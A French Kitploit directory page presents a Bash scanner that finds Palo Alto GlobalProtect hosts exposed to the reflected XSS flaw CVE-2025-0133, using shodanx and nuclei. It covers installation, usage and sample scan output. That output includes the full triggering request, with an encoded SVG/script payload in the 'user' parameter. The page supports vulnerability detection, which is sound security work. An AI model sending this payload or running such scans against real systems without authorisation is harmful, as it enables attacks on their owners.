Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-0133 — Vulnérabilité de type XSS réfléchi découverte dans Palo Alto GlobalProtect Gateway & Portal. Les attaquants peuvent injecter des scripts malveillants via des requêtes spécialement conçues. | Kitploit
Outils/GitHubGitHub/inteleon404/cve-2025-0133
ReconnaissanceScanners de VulnérabilitésScanners de Vulnérabilités WebExploitationSécurité WebTests d'Intrusion
GitHubinteleon404/cve-2025-0133

CVE-2025-0133

Vulnérabilité de type XSS réfléchi découverte dans Palo Alto GlobalProtect Gateway & Portal. Les attaquants peuvent injecter des scripts malveillants via des requêtes spécialement conçues.

Voir le dépôt
102il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Scanner de vulnérabilité CVE-2025-0133

Un outil de scan automatisé basé sur Bash pour détecter la vulnérabilité CVE-2025-0133 de type XSS réfléchi dans Palo Alto GlobalProtect Gateway & Portal à l'aide de nuclei et shodanx.


Auteur :

Date : 2025-06-23
Sévérité : Moyenne
Identifiant CVE : CVE-2025-0133
Type de vulnérabilité : Cross-Site Scripting réfléchi (XSS)
Testé contre : Palo Alto Networks GlobalProtect Portal (PAN-OS)


Vue d'ensemble

Cet outil aide les testeurs d'intrusion et les chercheurs en sécurité à identifier rapidement les domaines ou IP vulnérables liés au problème CVE-2025-0133.
Il exploite les templates nuclei et l'intégration des requêtes Shodan (shodanx) pour trouver et scanner efficacement les cibles.


Fonctionnalités

  • Détecte automatiquement si l'entrée est un domaine unique ou un fichier contenant plusieurs domaines/IP
  • Exécute shodanx sur les domaines uniques pour rassembler les hôtes associés
  • Utilise nuclei avec un template CVE-2025-0133 personnalisé pour scanner les cibles
  • Affiche les résultats du scan dans un format tabulaire clair en ligne de commande
  • Indique les heures de début et de fin du scan
  • Propose d'enregistrer les résultats aux formats .txt et .json
  • Aide intégrée et instructions d'utilisation

Prérequis

  • Environnement Linux avec le shell Bash
  • nuclei installé et accessible dans $PATH
  • shodanx) installé et configuré
  • Le fichier de template nuclei CVE-2025-0133 situé à :
    /home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (adaptez le chemin si nécessaire)

📦 Installation des outils requis

🔹 1. Installer ShodanX

root@kitploit:~
pip install git+https://github.com/RevoltSecurities/ShodanX 

Si l'erreur suivante s'affiche : "error: externally-managed-environment"

root@kitploit:~
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages

⚠️ Remarque : L'option --break-system-packages est nécessaire sur certains systèmes (notamment Debian/Ubuntu) pour permettre à pip d'installer des paquets en dehors d'un environnement virtuel sans erreurs de permission.

👉 Assurez-vous que shodanx est disponible dans votre $PATH. Vous pouvez le tester avec :

root@kitploit:~
shodanx -h

🔹 2. Installer Nuclei

root@kitploit:~
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

Vérifiez s'il est installé :

root@kitploit:~
nuclei -version

Mettez ensuite à jour les templates :

root@kitploit:~
nuclei -update-templates

Utilisation

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h 
Usage: ./cve20250133.sh <domain-or-file>

Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.

Options:
  -h, --help, help     Show this help message and exit.


Exemples

Scanner un domaine unique

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a single domain: domain.com — Running ShodanX first
     _                               _      
    | |            |                (_\  /  
 ,  | |     __   __|   __,   _  _      \/   
/ \_|/ \   /  \_/  |  /  |  / |/ |     /\   
 \/ |   |_/\__/ \_/|_/\_/|_/  |  |_/ _/  \_/
                                            
                                            

                     - RevoltSecurities

[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

Scanner à partir d'un fichier

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt       
Scan Start Time: 2025-06-24 16:36:37


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

Détails de CVE-2025-0133

Vulnérabilité de type Cross-Site Scripting (XSS) réfléchi dans Palo Alto GlobalProtect Gateway & Portal permettant à des attaquants d'injecter des scripts malveillants via des requêtes spécialement conçues. Appliquez les correctifs en mettant à jour vos systèmes vers les dernières versions de Palo Alto Networks pour atténuer ce problème.


Licence

Ce projet est sous licence MIT — voir le fichier LICENSE pour plus de détails.

Télécharger l’outil